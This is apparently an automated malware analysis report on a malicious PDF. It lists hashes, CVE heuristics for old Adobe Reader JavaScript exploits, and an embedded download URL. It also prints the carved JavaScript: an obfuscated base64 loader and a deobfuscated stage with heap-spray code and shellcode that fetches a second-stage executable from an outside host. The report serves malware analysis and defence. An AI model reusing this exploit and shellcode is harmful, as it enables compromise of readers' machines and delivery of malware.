Malicious PDF — malware analysis report

Static analysis result for SHA-256 64a0ab2b90c03714…

MALICIOUS

PDF

7.6 KB
MD5: f0913811412eb18a39c42b5a2932d86d SHA-1: e47741155f2c21a778615542e2aa80c360ffab06 SHA-256: 64a0ab2b90c03714428b5b66169809dafdc99663ae90ba1651c27481447d435f
558 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file contains JavaScript that exploits multiple Adobe Reader vulnerabilities (CVE-2009-0927, CVE-2007-5659, CVE-2008-2992). The embedded JavaScript decodes and executes a second-stage payload, which includes a URL to download further malicious content. The primary function of the script is to download and execute a second-stage payload from the embedded URL.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 11

  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://sexfid.com/exp/getexe.php?spl=pdf Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0009_000.js
7cc288f1c8634cbada25a99e29f81ea0ac5bfd98d118b9c026a7bf836ea563a0		 pdf-javascript-stream PDF /JS object 9 at offset 0xD6 19560 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function decode64(input) {
   var output = "";
   var chr1, chr2, chr3;
   var enc1, enc2, enc3, enc4;
   var i = 0;
   input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
   do {
      enc1 = keyStr.indexOf(input.charAt(i++));
      enc2 = keyStr.indexOf(input.charAt(i++));
      enc3 = keyStr.indexOf(input.charAt(i++));
      enc4 = keyStr.indexOf(input.charAt(i++));
      chr1 = (enc1 << 2) | (enc2 >> 4);
      chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
      chr3 = ((enc3 & 3) << 6) | enc4;
      output = output + String.fromCharCode(chr1);
      if (enc3 != 64) {
         output = output + String.fromCharCode(chr2);
      }
      if (enc4 != 64) {
         output = output + String.fromCharCode(chr3);
      }
   } while (i < input.length);
   return output;
}
var aasd = decode64("RFFwMllYSWdjRXBXY2xoUmNsY3dhMmhCU0RWTU55QTlJRzVsZHlCQmNuSmhlU2dwT3cwS2RtRnlJRzR4Y0hoM2RITnFlREJtWkZwVFJXYzdEUXBtZFc1amRHbHZiaUJ5YWxoS1FWQndTakJYVlZGaGNWaFBLSEZPVFcxSFJWZEVUa055ZUdVMlpGQXNJRVZDYVhwaFdVcHJOVzVCWm1ScE5GUXBlM2RvYVd4bElDaHhUazF0UjBWWFJFNURjbmhsTm1SUUxteGxibWQwYUNBcUlESWdQQ0JGUW1sNllWbEthelZ1UVdaa2FUUlVLWHR4VGsxdFIwVlhSRTVEY25obE5tUlFJQ3M5SUhGT1RXMUhSVmRFVGtOeWVHVTJaRkE3ZlhGT1RXMUhSVmRFVGtOeWVHVTJaRkFnUFNCeFRrMXRSMFZYUkU1RGNuaGxObVJRTG5OMVluTjBjbWx1Wnlnd0xDQkZRbWw2WVZsS2F6VnVRV1prYVRSVUlDOGdNaWs3RFFvZ0lISmxkSFZ5YmlCeFRrMXRSMFZYUkU1RGNuaGxObVJRTzMwTkNtWjFibU4wYVc5dUlFRTNhMGRHUjBkeFZERjZXVzF3Vmxvb1RWbENkRzlUYWtoVWFYRkdXRTF3V1NsN0RRcDJZWElnWkVNNE0yVnhTamxhUVU0NFYwTm1iQ0E5SUhWdVpYTmpZWEJsS0NJbGRUa3dPVEFsZFRrd09UQWlLVHNOQ25aaGNpQm9jMWh5Y25SSFQzZHNXbVpsVjI1MUlEMGdUVmxDZEc5VGFraFVhWEZHV0Uxd1dTQXRJREI0TnpBd01EQXdPdzBLZG1GeUlFeE5VRGRHWjFWRFVqUnlObUZtTVVRZ1BTQjFibVZ6WTJGd1pTZ2lKWFZCTVRZMEpYVXdNREU0SlhVd01EQXdKWFUwTURoQ0pYVTRRak13SlhVMU5EUXdKWFUwTURoQ0pYVTRRakEwSlhVd05EUXdKWFUwTURoQ0pYVXdSREEwSlhVd01ESXdKWFV3TURJd0pYVTNRek5FSlhVM056QXdKWFUzTkRBd0pYVkRNekF4SlhWRE1ETXpKWFU0UWpZMEpYVXpNRFF3SlhVd1F6YzRKWFUwTURoQ0pYVTRRakJESlhVeFF6Y3dKWFU0UWtGRUpYVXdPRFU0SlhVd09VVkNKWFUwTURoQ0pYVTRSRE0wSlhVM1F6UXdKWFUxT0RoQ0pYVTJRVE5ESlhVMVFUUkZKWFZGTWtReEpYVkZNakpDSlhWRlF6aENKWFUwTlVNM0pYVTJSVEV3SlhVMk5USkZKWFZETnpjNEpYVXhORFExSlhVd01VWkdKWFV3TURBd0pYVTBOVU0zSlhVd01EQXdKWFV3TURBd0pYVkZRakF3SlhVMVFUUkdKWFU0TXpVeUpYVTFOa1ZCSlhVMU5UZzVKWFUxTmpFNEpYVTRRalUzSlhVelF6Y3pKWFUzTkRoQ0pYVTNPRE16SlhWR016QXpKWFU0UWpVMkpYVXlNRGMySlhWR016QXpKWFZET1RNekpYVTFNRFE1SlhWQlJEUXhKWFZHUmpNekpYVXdSak0ySlhVeE5FSkZKWFV6T0RBekpYVTNORVl5SlhWRE1UQTRKWFV3UkVOR0pYVkdRVEF6SlhWRlFqUXdKWFUxT0VWR0pYVkdPRE5DSlhWRk5UYzFKWFU0UWpWRkpYVXlORFEySlhWRE16QXpKWFU0UWpZMkpYVTBPREJESlhVMU5qaENKWFV3TXpGREpYVTRRa1F6SlhVNFFUQTBKWFZETXpBekpYVTFSVFZHSlhWRE16VXdKWFUzUkRoRUpYVTFOekZESlhWQ09EVXlKWFZEUVRNekpYVTFRamhCSlhWQk1rVTRKWFZHUmtaR0pYVXpNa1pHSlhVNFFrTXdKWFZHTWtZM0pYVTBSa0ZGSlhVME5UaENKWFZCUWpFd0pYVTVPRFkySlhWQlFqWTJKWFZETURNekpYVTJNVUk0SlhVd01EWTBKWFUxTURBd0pYVTFORFk0SlhVM01qWTRKWFV6TlRZMUpYVXhRekkwSlhVM05EWTVKWFUxTkRVd0pYVkNPRFV6SlhWR1EwRkJKWFUzUXpCRUpYVTFOVVpHSlhVNE16RTRKWFV3UTBNMEpYVkNNRFV3SlhVNFFUWkRKWFU1T0VVd0pYVTJPRFV3SlhVMlJUWkdKWFUyTkRKRkpYVTNOVFk0SlhVMlF6Y3lKWFUxTkRaRUpYVTRSVUk0SlhVd1JUUkZKWFZHUmtWREpYVXhPRFUxSlhWRE5EZ3pKWFU1TXpCREpYVXpNelV3SlhVMU1FTXdKWFUxTmpVd0pYVTFOVGhDSlhVd016RTRKWFV4TkRVMUpYVTFNRFV5SlhVek5rSTRKWFV5UmpGQkpYVkdSamN3SlhVeE9EVTFKWFU0TXpWQ0pYVXdNRGRFSlhVd1JqQXhKWFU1UlRnMUpYVXdNREF3SlhVMlFUQXdKWFUyT0RBd0pYVXdNRGd3SlhVd01EQXdKWFV3TXpaQkpYVXdNRFpCSlhVd016WkJKWFV3TURZNEpYVXdNREF3SlhVMU5rTXdKWFZCTlVJNEpYVXdNREUzSlhWR1JqZERKWFV4T0RVMUpYVTBOVGc1SlhVMlFUQTBKWFUyT0RBMEpYVXhNREF3SlhVd01EQXdKWFV3TURZNEpYVXdPREF3SlhVMlFUQXdKWFZDT0RBd0pYVkRRVFUwSlhVNU1VRkdKWFUxTlVaR0pYVTRPVEU0SlhVd1F6UTFKWFUyUVRVd0pYVTRSREF3SlhVd09EUkVKWFUyT0RVeEpYVXdNREF3SlhVd01EQTRKWFZHUmpVd0pYVXdORGMxSlhVeE5rSTRKWFZHUVRZMUpYVkdSakV3SlhVeE9EVTFKWFU0UWpWR0pYVTRNekUzSlhVd05FTTNKWFUwUkRoQ0pYVTRNekE0SlhVd05FVTVKWFZCTjBVNEpYVXdNREF3SlhVMlFUQXdKWFUyUVRBd0pYVTJRVEF3SlhWR1JqQXdKWFV3TkRjMUpYVkJRMEk0SlhWRVFUQTRKWFZHUmpjMkpYVXhPRFUxSlhVd01EWkJKWFUwUkRoRUpYVTFNVEE0SlhVM05VWkdKWFZHUmpBNEpYVXdRemMxSlhVd05EZ3pKWFV3TkRJMEpYVTNOVVpHSlhWQ09EQTBKWF
... (truncated)
custom_b64_stage_000.js
880374c10ba0dc3b9c973d8d40c84dc20e0cf8c8a32a8b91a7207147b2068870		 deobfuscated-js custom Base64 decoded JavaScript layer 2 (PDF /JS object 9) at offset 0x450 10478 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 9 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pJVrXQrW0khAH5L7 = new Array();
var n1pxwtsjx0fdZSEg;
function rjXJAPpJ0WUQaqXO(qNMmGEWDNCrxe6dP, EBizaYJk5nAfdi4T){while (qNMmGEWDNCrxe6dP.length * 2 < EBizaYJk5nAfdi4T){qNMmGEWDNCrxe6dP += qNMmGEWDNCrxe6dP;}qNMmGEWDNCrxe6dP = qNMmGEWDNCrxe6dP.substring(0, EBizaYJk5nAfdi4T / 2);
  return qNMmGEWDNCrxe6dP;}
function A7kGFGGqT1zYmpVZ(MYBtoSjHTiqFXMpY){
var dC83eqJ9ZAN8WCfl = unescape("%u9090%u9090");
var hsXrrtGOwlZfeWnu = MYBtoSjHTiqFXMpY - 0x700000;
var LMP7FgUCR4r6af1D = unescape("%uA164%u0018%u0000%u408B%u8B30%u5440%u408B%u8B04%u0440%u408B%u0D04%u0020%u0020%u7C3D%u7700%u7400%uC301%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A4E%uE2D1%uE22B%uEC8B%u45C7%u6E10%u652E%uC778%u1445%u01FF%u0000%u45C7%u0000%u0000%uEB00%u5A4F%u8352%u56EA%u5589%u5618%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u571C%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u458B%uAB10%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8318%u0CC4%uB050%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u1855%uC483%u930C%u3350%u50C0%u5650%u558B%u0318%u1455%u5052%u36B8%u2F1A%uFF70%u1855%u835B%u007D%u0F01%u9E85%u0000%u6A00%u6800%u0080%u0000%u036A%u006A%u036A%u0068%u0000%u56C0%uA5B8%u0017%uFF7C%u1855%u4589%u6A04%u6804%u1000%u0000%u0068%u0800%u6A00%uB800%uCA54%u91AF%u55FF%u8918%u0C45%u6A50%u8D00%u084D%u6851%u0000%u0008%uFF50%u0475%u16B8%uFA65%uFF10%u1855%u8B5F%u8317%u04C7%u4D8B%u8308%u04E9%uA7E8%u0000%u6A00%u6A00%u6A00%uFF00%u0475%uACB8%uDA08%uFF76%u1855%u006A%u4D8D%u5108%u75FF%uFF08%u0C75%u0483%u0424%u75FF%uB804%u791F%uE80A%u55FF%uFF18%u0475%uFBB8%uFD97%uFF0F%u1855%u45C7%u0200%u0000%u5700%uB856%uFE98%u0E8A%u55FF%uEB18%u182A%uF92A%uD2B7%uB377%u4501%u928A%uADB7%u5D50%u67E4%uE6F5%u1AC7%uABBF%u101E%u7642%uA1A2%u6354%u7B09%uB089%u97F4%u734E%u3F93%u83F1%u007D%u7402%uC760%u0045%u0001%u0000%u45C7%u7910%u652E%uC778%u1445%u0172%u0000%u7D8B%u0318%u147D%u26B9%u0000%u8B00%uFC57%u05E8%u0000%uE900%uFE7C%uFFFF%uC033%u078A%uC8D2%uC132%uD0F6%uC532%uC232%uC632%uC0D2%uC102%uC502%uC202%uC602%uC8D2%uC12A%uC52A%uD0F6%uC22A%uC62A%uC0D2%uC2D3%uCA0F%u0788%u4947%uCE75%uC3C3%u7468%u7074%u2F3A%u732F%u7865%u6966%u2E64%u6F63%u2F6D%u7865%u2F70%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664");
while (dC83eqJ9ZAN8WCfl.length<slackspace) dC83eqJ9ZAN8WCfl+=dC83eqJ9ZAN8WCfl;
LMP7FgUCR4r6af1D = MYBtoSjHTiqFXMpY.substring(0, MYBtoSjHTiqFXMpY);}
function pPGLenZ2zQydVc4K(cmKOKd9OQJ5429X8){
  var DnTCb3DaTCEzoHKc = 0x0c0c0c0c;var Ge1OI0niSrmUzKbX = unescape("%uA164%u0018%u0000%u408B%u8B30%u5440%u408B%u8B04%u0440%u408B%u0D04%u0020%u0020%u7C3D%u7700%u7400%uC301%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A4E%uE2D1%uE22B%uEC8B%u45C7%u6E10%u652E%uC778%u1445%u01FF%u0000%u45C7%u0000%u0000%uEB00%u5A4F%u8352%u56EA%u5589%u5618%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u571C%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u458B%uAB10%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8318%u0CC4%uB050%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u1855%uC483%u930C%u3350%u50C0%u5650%u558B%u0318%u1455%u5052%u36B8%u2F1A%uFF70%u1855%u835B%u007D%u0F01%u9E85%u0000%u6A00%u6800%u0080%u0000%u036A%u006A%u036A%u0068%u0000%u56C0%uA5B8%u0017%uFF7C%u1855%u4589%u6A04%u6804%u1000%u0000%u0068%u0800%u6A00%uB800%uCA54%u91AF%u55FF%u8918%u0C45%u6A50%u8D00%u084D%u6851%u0000%u0008%uFF50%u0475%u16B8%uFA65%uFF10%u1855%u8B5F%u8317%u04C7%u4D8B%u8308%u04E9%uA7E8%u0000%u6A00%u6A00%u6A00%uFF00%u0475%uACB8%uDA08%uFF76%u1855%u006A%u4D8D%u5108%u75FF%uFF08%u0C75%u0483%u0424%u75FF%uB804%u791F%uE80A%u55FF%uFF18%u0475%uFBB8%uFD97%uFF0F%u1855%u45C7%u0200%u0
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.